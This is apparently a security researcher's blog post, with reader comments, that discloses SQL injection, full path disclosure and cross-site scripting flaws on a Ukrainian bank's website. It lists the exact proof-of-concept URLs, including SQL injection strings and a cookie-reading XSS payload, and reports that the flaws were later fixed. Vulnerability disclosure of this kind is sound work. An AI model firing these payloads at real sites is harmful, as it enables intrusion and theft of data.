Уразливості на www.agrocombank.kiev.ua
19:01 20.03.201026.08.2009
У січні, 06.01.2009, я знайшов SQL Injection уразливості, а сьогодні ще Full path disclosure, SQL Injection та Cross-Site Scripting уразливості на http://www.agrocombank.kiev.ua - сайті Агрокомбанка. Про що найближчим часом сповіщу адміністрацію сайта.
Стосовно уразливостей на сайтах банків останній раз я писав про нові уразливості на www.privatbank.ua.
Детальна інформація про уразливості з’явиться пізніше.
20.03.2010
SQL Injection:
http://www.agrocombank.kiev.ua/modules.php?op=modload&name=News&file=article&sid=-1%20or%20version()%3E4
http://www.agrocombank.kiev.ua/modules.php?op=modload&name=AStatic&file=index&sid=-1%20or%20version()%3E4
Раніше на сайті використовувався PHP-Nuke, в якому я і знайшов ці дві уразливості. Але потім на сайті змінили движок на новий, в якому я знайшов нові уразливості.
Full path disclosure:
http://www.agrocombank.kiev.ua/agrocombank/search/’/
SQL Injection:
http://www.agrocombank.kiev.ua/agrocombank/search/'%20and%20version()%3E5--%20/
XSS:
http://www.agrocombank.kiev.ua/agrocombank/search/'1%3Cbody%20onload=alert(document.cookie)%3E/
Дані уразливості вже виправлені.
Четвер, 20:33 27.08.2009
Вам должны платить серьезные гонорары за нахождение уязвимостей )
Четвер, 23:32 27.08.2009
Роман, серьёзных гонораров мне никто не платит
. За более чем три года работы моего веб сайта (и 4,5 года, что я занимаюсь веб безопасностью), мало кто из админов и владельцев сайтов мне даже спасибо сказал за уведомление их об уязвимостях на их сайтах.
А так как следить за безопасностью в Уанете мало кто хочет и тем более вкладывать в это деньги (а Украина для меня является основным рынком деятельности), что мне хорошо известно, то соответственно мало кто заказывает у меня аудит безопасности, а если и заказывает, то за небольшие деньги. При том, что у меня и так одни из самых доступных цен на рынке (но клиентам всегда хочется ещё дешевле). Поэтому на данный момент о серьёзных гонорарах речь не идёт и неизвестно когда данная ситуация в Украине изменится.
Вівторок, 11:11 08.09.2009
Спасибо.
Вівторок, 16:22 08.09.2009
Всегда пожалуйста.
Середа, 13:39 09.09.2009
Добрый день, защиту от Full path disclosure, SQL Injection та Cross-Site Scripting мы поставили. Свяжитесь со мной пожалуйста по емейлу, так как я думаю, что комменты будут неподходящим местом для обсуждения некоторых тем.
Середа, 19:07 09.09.2009
Сергей
Вы попытались исправить, но исправили не полностью. И с небольшим изменением атакующего кода, все три уязвимости снова работают. Как я проверил их, после получения от вас сообщения об исправлении уязвимостей. Так что вам нужно будет их полностью исправить и в дальнейшем следить за безопасностью своего движка и своих веб сайтов.
Связаться со мной можно как через комменты, так и по емайлу - кому как удобнее. Я писал вам и администрации Агрокомбанка со своего емайла, поэтому он у вас есть, к тому же мой емайл размещён в футере всех страниц моего сайта. Так что если вам нужно, вы легко можете со мной связаться.